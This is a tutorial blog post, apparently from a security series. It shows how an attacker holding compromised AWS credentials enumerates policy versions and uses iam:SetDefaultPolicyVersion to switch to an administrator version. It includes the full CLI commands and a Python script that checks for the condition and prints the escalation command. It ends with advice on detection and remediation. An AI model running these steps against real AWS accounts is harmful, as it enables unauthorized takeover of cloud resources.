
Privilege Escalation Series 1 - iam:SetDefaultPolicyVersion
- Ts3c
- AWS , Privilege Escalation , Cloud
- January 22, 2024
In this series of blog posts I will describe some techniques for privilege escalation in AWS.
The first one covers the permission iam:SetDefaultPolicyVersion.
Let's assume an attacker has obtained valid AWS credentials. After analysing the credentials and their permissions, the attacker finds that the user can list the policies attached to it, read the versions of those policies, and set a different version of a policy as the default. Only the default version of a managed policy is in force, so switching the default to a more permissive version immediately changes the effective permissions of every principal the policy is attached to.
Now enough of the theory, let's jump into the hands-on practice.
First we want to know which identity the credentials belong to:
aws sts get-caller-identity --profile testuser
Then we try to list the RDS DB instances.
aws rds describe-db-instances --region us-east-1 --profile testuser
This call fails because the user testuser does not have the necessary permission (rds:DescribeDBInstances). Let's continue our enumeration.
Next we have a look at the IAM permissions and list all managed policies attached to the user testuser.
aws iam list-attached-user-policies --user-name testuser --profile testuser
We receive a list with one entry. Let's analyse this policy in more detail by calling the get-policy endpoint.
aws iam get-policy --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --profile testuser
We successfully receive some details of this policy, including its current default version. We also see that version IDs up to v7 exist. According to the AWS documentation a managed policy can hold at most five versions at a time; an old version has to be deleted before a new one can be created, which is why the IDs keep counting past v5 even though fewer versions are retained.
Now we need to analyse the policy versions. At the moment version v6 is the default. To analyse it we call the get-policy-version endpoint with the version-id set to v6.
aws iam get-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v6 --profile testuser
This looks like a normal, restricted policy. We repeat this step for every other retained version. Finally we analyse policy version v7.
aws iam get-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v7 --profile testuser
Nice! This policy version grants administrator rights. Because our current default version allows iam:SetDefaultPolicyVersion, we set the default version of the policy to v7 and thereby escalate our privileges.
aws iam set-default-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v7 --profile testuser
In the beginning we wanted to list the database instances. If we now run that command again, it works like a charm, because IAM evaluates the new default version right away.
aws rds describe-db-instances --region us-east-1 --profile testuser
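The version-by-version inspection above is easy to automate. The following Python script is an added example and not part of the original post: given the documents of all retained versions of a managed policy and the ID of the current default, it checks whether the default version grants iam:SetDefaultPolicyVersion, and lists the non-default versions that are administrator-equivalent, which is exactly the condition under which the escalation works. The policy documents in SAMPLE_VERSIONS are constructed for this example (they stand in for the output of get-policy-version, with v1 and v2 assumed deleted); the live_versions helper that feeds real data in via boto3 is an assumption about how one would wire it up and is not needed for the offline run.

```python
"""Added example: decide whether iam:SetDefaultPolicyVersion yields privilege
escalation by comparing every retained policy version with the current default."""
import fnmatch
import json
from dataclasses import asdict, dataclass, field
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample standing in for the documents returned by
# `aws iam get-policy-version` for each retained version of test_priv_esc_policy.
# v1 and v2 are assumed deleted: a managed policy holds at most five versions,
# so the IDs keep counting past v5 once old versions are removed.
SAMPLE_VERSIONS: Dict[str, Dict[str, Any]] = {
    "v3": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"}]},
    "v4": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["iam:GetPolicy", "iam:GetPolicyVersion",
                                       "iam:ListAttachedUserPolicies"], "Resource": "*"}]},
    "v5": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:Get*", "Resource": "*"}]},
    "v6": {"Version": "2012-10-17", "Statement": [  # the current default
        {"Effect": "Allow", "Action": ["sts:GetCallerIdentity", "iam:ListAttachedUserPolicies",
                                       "iam:GetPolicy", "iam:GetPolicyVersion",
                                       "iam:ListPolicyVersions", "iam:SetDefaultPolicyVersion"],
         "Resource": "*"}]},
    "v7": {"Version": "2012-10-17", "Statement": [  # stale admin version
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]},
}
SAMPLE_DEFAULT = "v6"


def _as_list(value: Any) -> List[Any]:
    """IAM lets Statement, Action and Resource be a single string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def action_allowed(doc: Dict[str, Any], action: str) -> bool:
    """True if `doc` grants `action` on some resource. Action names are matched
    case-insensitively with IAM's * and ? wildcards. Conservative on conditions:
    a conditional Allow is not counted, a conditional Deny still vetoes.
    NotAction statements are not handled."""
    allowed = denied = False
    for stmt in _as_list(doc.get("Statement")):
        patterns = [p.lower() for p in _as_list(stmt.get("Action"))]
        if not any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
            continue
        if stmt.get("Effect") == "Deny":
            denied = True
        elif stmt.get("Effect") == "Allow" and not stmt.get("Condition"):
            allowed = True
    return allowed and not denied


def is_admin(doc: Dict[str, Any]) -> bool:
    """Administrator-equivalent: an unconditional Allow of "*" on "*" and no
    Deny statement anywhere in the document that could narrow it."""
    stmts = _as_list(doc.get("Statement"))
    if any(s.get("Effect") == "Deny" for s in stmts):
        return False
    return any(s.get("Effect") == "Allow" and not s.get("Condition")
               and "*" in _as_list(s.get("Action")) and "*" in _as_list(s.get("Resource"))
               for s in stmts)


@dataclass
class Assessment:
    default_version: str
    can_set_default: bool      # does the default grant iam:SetDefaultPolicyVersion?
    default_is_admin: bool     # nothing to gain if the default is already admin
    admin_versions: List[str] = field(default_factory=list)  # non-default admin versions

    @property
    def escalation_possible(self) -> bool:
        return self.can_set_default and not self.default_is_admin and bool(self.admin_versions)


def assess(versions: Dict[str, Dict[str, Any]], default_id: str) -> Assessment:
    """Run the check the post performs by hand across all retained versions."""
    default_doc = versions[default_id]
    result = Assessment(default_version=default_id,
                        can_set_default=action_allowed(default_doc, "iam:SetDefaultPolicyVersion"),
                        default_is_admin=is_admin(default_doc))
    result.admin_versions = sorted((vid for vid, doc in versions.items()
                                    if vid != default_id and is_admin(doc)),
                                   key=lambda v: int(v.lstrip("v")))
    return result


def live_versions(policy_arn: str, profile: Optional[str] = None
                  ) -> Tuple[Dict[str, Dict[str, Any]], str]:
    """Assumed live path: fetch every retained version with boto3 (needs credentials,
    not used by the offline run). boto3 returns the document already URL-decoded."""
    import boto3  # imported here so the offline analysis has no AWS dependency
    iam = boto3.Session(profile_name=profile).client("iam")
    versions, default_id = {}, ""
    for v in iam.list_policy_versions(PolicyArn=policy_arn)["Versions"]:
        body = iam.get_policy_version(PolicyArn=policy_arn, VersionId=v["VersionId"])
        versions[v["VersionId"]] = body["PolicyVersion"]["Document"]
        if v["IsDefaultVersion"]:
            default_id = v["VersionId"]
    return versions, default_id


if __name__ == "__main__":
    report = assess(SAMPLE_VERSIONS, SAMPLE_DEFAULT)
    print(json.dumps(asdict(report), indent=2))
    if report.escalation_possible:
        print("escalate with: aws iam set-default-policy-version --policy-arn <arn> "
              f"--version-id {report.admin_versions[-1]}")
```

On the sample data the report says escalation is possible and names v7, which matches the walkthrough. Swap in live_versions(policy_arn, profile) for the sample to assess a real policy. Keep in mind that the set-default-policy-version call is logged by CloudTrail as an iam.amazonaws.com event named SetDefaultPolicyVersion, so defenders can alert on it, and that the cleanest fix is to delete stale permissive versions and to avoid granting iam:SetDefaultPolicyVersion to principals that the policy itself is attached to.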